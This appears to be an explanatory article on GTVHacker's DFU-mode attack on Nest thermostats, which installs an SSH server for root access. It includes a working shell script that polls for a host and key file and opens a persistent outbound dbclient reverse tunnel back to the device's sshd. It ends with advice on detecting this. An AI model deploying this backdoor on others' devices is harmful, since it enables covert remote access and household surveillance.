Google’s Nest sells a range of popular network-connected home devices, the best known of which is a thermostat that lets a user control their household temperature remotely from a smartphone.
Useful as it is, a device like this, if not well protected, can give an attacker the ability to remotely monitor the user’s habits or network traffic.
GTVHacker describe a method of attacking Nest brand thermostats that leverages the device’s DFU mode to boot unsigned code at the boot-loader level.
Because nothing loaded through this mode is verified, an attacker with brief physical access can hijack the device’s code flow very early in the boot process and make changes without any restrictions.
The Nest uses a CPU similar to the OMAP3630 series. This CPU features a Device Firmware Update (DFU) mode that can be entered by holding down the Nest’s screen while the device is off.
This mode is intended to let the manufacturer easily diagnose and repair the device. Unfortunately, in the case of the Nest, it also allows anyone holding the device to modify it without restriction.
DFU mode is only meant as a catalyst for loading the next stages of code, the first of which in this case is the x-loader binary. X-loader is a stage 1 boot-loader that serves on the Nest as the initial loading point for the system.
From x-loader, GTVHacker used a custom-modified version of U-Boot, based on the GPL-released Nest version, to boot a Linux kernel.
That Linux kernel is only used to access the Nest’s file system and add a cross-compiled SSH server, Dropbear. Once it is installed, a user can connect to the Nest over SSH and obtain root access on their own thermostat, and anyone who has run the same procedure on someone else’s thermostat gets the same access.
After installing the SSH server, they add a shell (sh) script that checks the Nest’s virtual disk every 10 minutes for two files: “host.txt”, which contains a username and host in the “username@ipaddress” format, and “key.txt”, which contains the RSA private key for the SSH connection. When both are present the script uses them to open an SSH connection from the thermostat out to that host, so the foothold survives reboots and does not depend on any inbound access to the home network.
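The following script is an added example written for this page; it is not GTVHacker’s script and does not come from the Nest firmware. It reproduces the polling behaviour described above in POSIX sh: every 10 minutes it looks in a “virtual disk” directory for host.txt and key.txt, validates the “username@ipaddress” line so a planted file cannot inject shell syntax, and then asks Dropbear’s client, dbclient, to connect out and forward a remote port back to the thermostat’s own SSH daemon. The directory path, the port numbers, and the use of dbclient’s -y, -i, -N and -R flags are assumptions of this example. DRY_RUN=1 prints the command instead of running it, which is also how the accompanying test exercises it.

```shell
#!/bin/sh
# Added example, not the original Nest persistence script.
# Polls a directory for host.txt ("username@ipaddress") and key.txt (an SSH
# private key). When both exist, opens an outbound SSH session with dbclient
# and requests a reverse forward so the remote host can reach the
# thermostat's sshd. All paths/ports below are assumptions for illustration.

DISK="${NEST_DISK:-/tmp/nest_disk}"   # assumed location of the "virtual disk"
LOCAL_SSH_PORT=22                      # Dropbear sshd listening on the thermostat
REMOTE_BIND_PORT=2222                  # port the remote host will listen on
INTERVAL=600                           # 10 minutes, as in the described script

# valid_target: accept only "user@dotted-quad". Anything else (shell
# metacharacters, hostnames, extra fields) is rejected. Returns 0 when valid.
valid_target() {
    printf '%s' "$1" |
        grep -Eq '^[A-Za-z0-9_][A-Za-z0-9_.-]*@([0-9]{1,3}\.){3}[0-9]{1,3}$'
}

# check_once: if both files are present and host.txt is well-formed, print
# the validated "user@ip" target and return 0; otherwise print nothing and
# return 1.
check_once() {
    [ -s "$DISK/host.txt" ] && [ -s "$DISK/key.txt" ] || return 1
    target=$(tr -d '\r\n' < "$DISK/host.txt")
    valid_target "$target" || return 1
    printf '%s\n' "$target"
}

# build_command: the dbclient invocation for a target and key file.
#   -y  accept the remote host key without prompting
#   -i  identity (private key) file
#   -N  no remote command, just keep the session open
#   -R  listenport:host:port reverse forward back to the local sshd
build_command() {
    printf 'dbclient -y -i %s -N -R %s:127.0.0.1:%s %s\n' \
        "$2" "$REMOTE_BIND_PORT" "$LOCAL_SSH_PORT" "$1"
}

# run_loop: the 10-minute polling loop. dbclient blocks while the tunnel is
# up; when it drops, the loop sleeps and reconnects on the next pass.
run_loop() {
    while :; do
        if target=$(check_once); then
            if [ "${DRY_RUN:-0}" = 1 ]; then
                build_command "$target" "$DISK/key.txt"
            else
                chmod 600 "$DISK/key.txt"   # dbclient wants a private key file
                dbclient -y -i "$DISK/key.txt" -N \
                    -R "$REMOTE_BIND_PORT:127.0.0.1:$LOCAL_SSH_PORT" "$target"
            fi
        fi
        sleep "$INTERVAL"
    done
}

# Only start polling when invoked as "sh script.sh run", so the functions
# can also be sourced and exercised without starting the loop.
case "${1:-}" in
    run) run_loop ;;
esac
```

From a defender’s point of view the same script is the detection opportunity: an IoT device that makes an outbound SSH connection to an address it has never talked to, every ten minutes, is easy to flag at the home router, and the host.txt/key.txt pair on the device’s storage is the forensic artifact to look for.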